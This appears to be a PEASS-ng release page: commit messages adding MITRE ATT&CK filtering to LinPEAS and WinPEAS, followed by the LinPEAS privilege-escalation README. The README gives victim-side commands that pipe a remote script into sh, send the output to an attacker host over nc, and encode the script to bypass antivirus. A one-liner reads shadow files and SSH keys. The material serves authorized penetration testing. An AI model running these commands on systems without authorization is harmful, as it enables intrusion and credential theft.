* feat: MITRE ATT&CK integration for LinPEAS and WinPEAS
  - Add -T T1234,T5678 flag to LinPEAS to filter checks by technique
  - Add mitre=T1234,T5678 argument to WinPEAS for technique-based filtering
  - Annotate every check title with MITRE technique ID(s) displayed in grey
  - Add $_mitre_tag to Generated Global Variables in 0_variables_base.sh
  - Add check_mitre_filter() shell function with prefix-match support
  - Add MitreAttackIds property to ISystemCheck interface (C#)
  - Update MainPrint/GreatPrint in Beaprint.cs to accept optional mitreIds
  - Tag all 158 LinPEAS check modules with # Mitre: metadata
  - Tag all 16 WinPEAS check classes with MitreAttackIds property
  - Update linpeasModule.py to parse # Mitre: metadata field
  - Update linpeasBaseBuilder.py to emit check_mitre_filter wrappers
  - Add 3 MITRE argument parsing tests to ArgumentParsingTests.cs
* test: add MITRE filter coverage for LinPEAS builder and WinPEAS
  LinPEAS (test_builder.py):
  - test_mitre_flag_present_in_getopts: -T: must appear in getopts string
  - test_mitre_flag_present_in_help_text: -T must appear in built help text
  - test_mitre_filter_function_present: check_mitre_filter() must be in built script
  WinPEAS (ArgumentParsingTests.cs):
  - PassesMitreFilter_EmptyFilter_AllChecksPass: no filter -> all checks run
  - PassesMitreFilter_ExactMatch_Passes: T1082 filter matches T1082 check
  - PassesMitreFilter_NoMatch_Fails: T1082 filter rejects T1057 check
  - PassesMitreFilter_PrefixMatch_Passes: T1552 filter matches T1552.001/T1552.005
  - PassesMitreFilter_SubtechniqueDoesNotMatchDifferentBase_Fails: T1548 != T1552.001
* chore: ignore .github/instructions/ and untrack todos.instructions.md
* fix: complete and accurate MITRE ATT&CK mappings for LinPEAS and WinPEAS
  gitignore:
  - Add .github/instructions/ to .gitignore and untrack todos.instructions.md
  LinPEAS — corrected mappings:
  - 29_Interesting_environment_variables.sh: add missing T1552.007,T1082
  - 3_USBCreator.sh: T1548 → T1548.003,T1068 (polkit bypass + CVE-class exploit)
  - 9_Doas.sh: T1548 → T1548.003 (doas is a sudo/sudo-caching equivalent)
  - 10_Pkexec.sh: T1548 → T1548.003,T1548.004,T1068 per-section specificity
  - 2_Process_cred_in_memory.sh: T1003,T1055 → T1003.007 (Proc Filesystem, drop wrong T1055)
  - 11_Superusers.sh: T1087.001,T1548 → T1087.001 (discovery only, no elevation abuse)
  - 14/15/16 writable files: T1574 → T1574.009,T1574.010 (specific sub-techniques)
  WinPEAS — corrected mappings:
  - SystemInfo: class expanded to full technique union; WSUS T1195→T1072,T1068; KrbRelayUp T1558→T1187,T1558; Object Manager T1548→T1068; Named Pipes T1559.001→T1559; Low-priv pipes T1559.001→T1134.001,T1559
  - EventsInfo: class expanded with T1078.003,T1552.001,T1059.001,T1082
  - UserInfo: class expanded; Token privileges T1134→T1134.001
  - ProcessInfo: Leaked Handlers T1134.003→T1134.001 (token impersonation, not make-token)
  - ServicesInfo: class adds T1574.011,T1068
  - ApplicationsInfo: class adds T1010,T1014
  - NetworkInfo: class adds T1018,T1090
  - ActiveDirectoryInfo: T1484→T1484.001; class adds T1003
  - WindowsCreds: class sub-techniques T1552→T1552.001,T1552.002, T1555→T1555.003,T1555.004; SSClient T1059→T1552.001 (wrong technique entirely)
  - FilesInfo: class expanded with T1552.002,T1552.004,T1552.006,T1564.001,T1574.001, T1059.004,T1114.001,T1218,T1649; Cloud Credentials T1552.005→T1552.001
  - SoapClientInfo: T1059,T1071→T1559,T1071.001 (IPC/Web protocol, not scripting)
* fix: add missing T1613 and T1562.001 to SystemInfo class-level MitreAttackIds; label AD object enumeration with T1087.002 and T1018
* fix: correct linpeas mitre filter matching logic
* fix: MITRE code bugs — pass-through for untagged checks, remove dead OR in section gate
  - PassesMitreFilter (Checks.cs): when MitreAttackIds is null or empty and a filter is active, return true (pass-through) instead of false. Previously any future ISystemCheck added without MITRE IDs would be silently excluded by an active filter.
  - linpeasBaseBuilder.py: remove redundant '|| [ -z "$MITRE_FILTER" ]' from the generated section-level gate. check_mitre_filter already returns 0 immediately when MITRE_FILTER is empty, so the OR branch was unreachable and inconsistent with the check-level gate which uses the same function without the extra guard.
  - ArgumentParsingTests.cs: add PassesMitreFilter_NullMitreAttackIds_PassesThrough and PassesMitreFilter_EmptyMitreAttackIds_PassesThrough regression tests.
* fix(mitre): 4 bugs — dead arg parser, wait logic, subprocess forks, cleanup race
  Checks.cs: max-regex-file-size used string.Equals which requires exact match, so 'max-regex-file-size=500000' could never match and MaxRegexFileSize was stuck at 1000000 forever. Fixed to arg.StartsWith.
  Checks.cs RunChecks: wait compared loop index i against _systemCheckSelectedKeysHashSet.Count, which is 0 when all checks run (so i < -1 is always false) and semantically wrong when a key subset is selected. Replaced with a pre-count of checks that pass both filters and a running counter.
  0_variables_base.sh check_mitre_filter: replaced two $(echo ... | tr ...) subprocess forks per call with pure parameter-expansion while-loops. Zero process forks, POSIX-compliant, ~632 fork()s saved per full filtered run. Declares _mitre_tags_left and _mitre_filters_left in Generated Global Variables.
  linpeas_builder.py: os.remove of the shared temp file raised FileNotFoundError when multiple sequential builder invocations ran (the second saw the file already deleted by the first). Wrapped in try/except FileNotFoundError.
  Tests: Added PassesMitreFilter_SubtechniqueFilter_DoesNotMatchParentOnlyTag and MaxRegexFileSize_ArgParsed_Correctly regression tests (16 total).
* ci: add manual build-artifacts workflow (winPEAS.exe + linpeas.sh)
* fix(linpeas): getopts silent mode — clear error when -T given without argument
  Switch getopts to silent mode (leading ':') so the shell does not emit its own terse 'No arg for -T option' message. Add explicit :) case that prints ERROR: -T requires an argument (e.g. -T T1082,T1552) and then dumps the help text before exiting 1. Add *) case for unrecognised flags with the same pattern. Behaviour for all valid flags is unchanged.
* chore: untrack build-artifacts workflow, add to .gitignore
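The technique filter and the silent-mode getopts handling that these commits describe, written here as an added illustration in POSIX sh. This is not PEASS-ng's own code: the function and variable names are only modelled on the ones in the messages, `parse_args` and `mitre_match` are my own helpers, and the matching rule (a filter ID matches a tag that is the same ID or one of its sub-techniques) is an assumption chosen to satisfy the test cases the messages list.

```shell
#!/bin/sh
# Illustrative re-implementation (not PEASS-ng's code) of a fork-free MITRE
# filter: an empty -T filter runs everything, an untagged check passes
# through, T1552 matches T1552.001, and T1552.001 does NOT match a bare T1552.

# check_mitre_filter "<comma-separated technique tags of one check>"
# Reads MITRE_FILTER (comma-separated IDs from -T). Returns 0 = run the check.
check_mitre_filter() {
  _mitre_tags_left="$1"
  [ -z "$MITRE_FILTER" ] && return 0      # no -T given: run every check
  [ -z "$_mitre_tags_left" ] && return 0  # untagged check: pass-through
  while [ -n "$_mitre_tags_left" ]; do
    # Peel the first tag off with parameter expansion: no subshell, no tr.
    _tag="${_mitre_tags_left%%,*}"
    case "$_mitre_tags_left" in
      *,*) _mitre_tags_left="${_mitre_tags_left#*,}" ;;
      *)   _mitre_tags_left="" ;;
    esac
    _mitre_filters_left="$MITRE_FILTER"
    while [ -n "$_mitre_filters_left" ]; do
      _flt="${_mitre_filters_left%%,*}"
      case "$_mitre_filters_left" in
        *,*) _mitre_filters_left="${_mitre_filters_left#*,}" ;;
        *)   _mitre_filters_left="" ;;
      esac
      # Exact ID, or the tag is a sub-technique of the filter ("T1552." prefix).
      case "$_tag" in
        "$_flt"|"$_flt".*) return 0 ;;
      esac
    done
  done
  return 1
}

# Helper (mine): evaluate one filter against one check's tags in a single call.
mitre_match() {
  MITRE_FILTER="$1"
  check_mitre_filter "$2"
}

# Silent-mode getopts (leading ':'): the shell stays quiet and we print our
# own error for a missing -T argument or an unknown flag. Returns 1 on error.
parse_args() {
  MITRE_FILTER=""
  OPTIND=1
  while getopts ":T:h" _opt; do
    case "$_opt" in
      T) MITRE_FILTER="$OPTARG" ;;
      h) echo "usage: $0 [-T T1082,T1552]" ;;
      :) echo "ERROR: -$OPTARG requires an argument (e.g. -T T1082,T1552)" >&2
         return 1 ;;
      *) echo "ERROR: unrecognised flag -$OPTARG" >&2
         return 1 ;;
    esac
  done
  return 0
}

# Stand-alone demo on constructed inputs: filter T1552 against three checks.
if parse_args -T T1552; then
  for tags in "T1552.001,T1552.005" "T1548" ""; do
    if check_mitre_filter "$tags"; then
      echo "run  [${tags:-untagged}]"
    else
      echo "skip [$tags]"
    fi
  done
fi
```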
LinPEAS - Linux Privilege Escalation Awesome Script
LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.wiki
Check the Local Linux Privilege Escalation checklist from book.hacktricks.wiki.
Dec 2025 update: linpeas now inspects Linux kernels for CVE-2025-38352 (POSIX CPU timers race) by combining CONFIG_POSIX_CPU_TIMERS_TASK_WORK state with kernel build information, so you immediately know if publicly available PoCs might succeed.
MacPEAS
Just execute linpeas.sh on a MacOS system and the MacPEAS version will be executed automatically.
Build your own linpeas!
The latest version of linpeas allows you to select the checks you would like your linpeas to have and build it only with those checks!
This allows you to create smaller and faster linpeas scripts for stealth and speed purposes.
Check how to select the checks you want to build into your own linpeas following this link.
Note that by default, on the releases page of this repository, you will find a linpeas with all the checks.
Differences between linpeas_fat.sh, linpeas.sh and linpeas_small.sh:
- linpeas_fat.sh: Contains all checks, even third party applications embedded in base64.
- linpeas.sh: Contains all checks, but only the third party application linux exploit suggester is embedded. This is the default linpeas.sh.
- linpeas_small.sh: Contains only the most important checks, making its size smaller.
Quick Start
Find the latest versions of all the scripts and binaries in the releases page.
# From public github
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Local network
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
# Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim
# Execute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
# Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors
# Use a linpeas binary
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
AV bypass
#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
Firmware Analysis
If you have a firmware image and you want to analyze it with linpeas to search for passwords or badly configured permissions, you have 2 main options.
- If you can emulate the firmware, just run linpeas inside of it:
cp /path/to/linpeas.sh /mnt/linpeas.sh
chroot /mnt #Supposing you have mounted the firmware FS in /mnt
bash /linpeas.sh -o software_information,interesting_files,api_keys_regex
- If you cannot emulate the firmware, use the -f </path/to/folder> param:
# Point to the folder containing the files you want to analyze
bash /path/to/linpeas.sh -f /path/to/folder
Basic Information
The goal of this script is to search for possible Privilege Escalation Paths (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS).
This script doesn't have any dependencies.
Recent updates
- Dec 2025: Added detection for sudo configurations that expose restic's --password-command helper, a common privilege escalation vector observed in real environments.
- Feb 2026: Added a reminder that linpeas can be run with -o to execute targeted checks in long-running audits.
It uses /bin/sh syntax, so it can run on anything supporting sh (and the binaries and parameters used).
By default, linpeas won't write anything to disk and won't try to login as any other user using su.
LinPEAS keeps expanding vendor-specific coverage; as of 29-Nov-2025 it warns when IGEL OS appliances still ship the SUID setup/date helpers that allow NetworkManager/systemd configuration hijacking (Metasploit module linux/local/igel_network_priv_esc).
By default linpeas takes around 4 mins to complete, but it could take from 5 to 10 minutes to execute all the checks using the -a parameter (recommended option for CTFs):
- From less than 1 min to 2 mins to make almost all the checks
- Almost 1 min to search for possible passwords inside all the accessible files of the system
- 20s/user bruteforce with top2000 passwords (needs -a) - Notice that this check is super noisy
- 1 min to monitor the processes in order to find very frequent cron jobs (needs -a) - Notice that this check will need to write some info inside a file that will be deleted
Interesting parameters:
- -a (all checks except regex) - This will also execute the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using su with the top2000 passwords.
- -e (extra enumeration) - This will execute enumeration checks that are avoided by default
- -r (regex checks) - This will search for hundreds of API keys of different platforms in the Filesystem
- -s (superfast & stealth) - This will bypass some time consuming checks - Stealth mode (Nothing will be written to disk)
- -P (Password) - Pass a password that will be used with sudo -l and for bruteforcing other users
- -D (Debug) - Print information about the checks that haven't discovered anything and about the time each check took
- -d/-p/-i/-t (Local Network Enumeration) - Linpeas can also discover and port-scan local networks
It's recommended to use the params -a and -r if you are looking for a complete and intensive scan.
Enumerate and search Privilege Escalation vectors.
This tool enumerates and searches for possible misconfigurations (known vulns, user, process and file permissions, special file permissions, readable/writable files, bruteforce of other users (top1000pwds), passwords...) inside the host and highlights possible misconfigurations with colors.
Checks:
-o Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files,api_keys_regex). Select a comma separated list.
-s Stealth & faster (don't check some time consuming checks)
-e Perform extra enumeration
-t Automatic network scan & Internet conectivity checks - This option writes to files
-r Enable Regexes (this can take from some mins to hours)
-P Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
-D Debug mode
Network recon:
-t Automatic network scan & Internet conectivity checks - This option writes to files
-d <IP/NETMASK> Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
-p <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
-i <IP> [-p <PORT(s)>] Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
Notice that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
Port forwarding:
-F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT Execute linpeas to forward a port from a local IP to a remote IP
Firmware recon:
-f </FOLDER/PATH> Execute linpeas to search passwords/file permissions misconfigs inside a folder
Misc:
-h To show this message
-w Wait execution between big blocks of checks
-L Force linpeas execution
-M Force macpeas execution
-q Do not show banner
-N Do not use colours
Hosts Discovery and Port Scanning
With LinPEAS you can also discover hosts automatically using fping, ping and/or nc, and scan ports using nc.
LinPEAS will automatically search for these binaries in $PATH and let you know if any of them is available. In that case you can use LinPEAS for host discovery and/or port scanning.
Colors
LinPEAS uses colors to indicate where each section begins. But it also uses them to identify potential misconfigurations.
- The Red/Yellow color is used for identifying configurations that lead to PE (99% sure).
- The Red color is used for identifying suspicious configurations that could lead to privilege escalation.
- The Green color is used for known good configurations (based on the name not on the content!)
- The Blue color is used for: Users without shell & Mounted devices
One-liner Enumerator
Here you have an old linpe version script in one line, just copy and paste it ;)
The color filtering is not available in the one-liner (the lists are too big)
This one-liner is deprecated (I'm not going to update it any more), but it could be useful in some cases so it will remain here.
The default file where all the data is stored is: /tmp/linPE (you can change it at the beginning of the script)
file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system information...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network information...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users information...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC >> $file;awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Login\n"$NC >> $file;w 2>/dev/null >> $file;last 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Users with console\n"$NC >> $file;cat /etc/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All users\n"$NC >> $file;cat /etc/passwd 2>/dev/null | cut -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering files information...";printf $B"[*] "$RED"INTERESTING FILES\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUID\n"$NC >> $file;find / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGID\n"$NC >> $file;find / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside \$HOME (limit 20)\n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First files of /home\n"$NC >> $file;find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside .ssh directory?\n"$NC >> $file;find /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* files\n"$NC >> $file;find / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?\n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?\n"$NC >> $file;cat /etc/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /etc/passwd? Readable /etc/shadow or /etc/master.passwd?\n"$NC >> $file;grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null >> $file;cat /etc/shadow /etc/master.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?\n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?\n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.conf\n"$NC >> $file;find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" \) -exec ls -l {} \; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden files (not in /sys/) (limit 100)\n"$NC >> $file;find / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backups\n"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Interesting writable Files\n"$NC >> $file;USER=`whoami`;HOME=/home/$USER;find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| sort | uniq >> $file;for g in `groups`; do find / \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; done >> $file;echo "" >> $file;printf $Y"[+] "$RED"Web files?(output limited)\n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head >> $file;ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup files?\n"$NC >> $file;find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find IPs inside logs\n"$NC >> $file;grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find 'password' or 'passw' string inside /home, /var/www, /var/log, /etc\n"$NC >> $file;grep -lRi "password\|passw" /home /var/www /var/log 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (you need to puts the password and the result appear in console)\n"$NC >> $file;sudo -l;
PEASS Style
Are you a PEASS fan? Get now our merch at PEASS Shop and show your love for our favorite peas
Collaborate
If you want to help with the TODO tasks or with anything, you can do it using github issues or you can submit a pull request.
If you find any issue, please report it using github issues.
Linpeas is being updated every time I find something that could be useful to escalate privileges.
Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.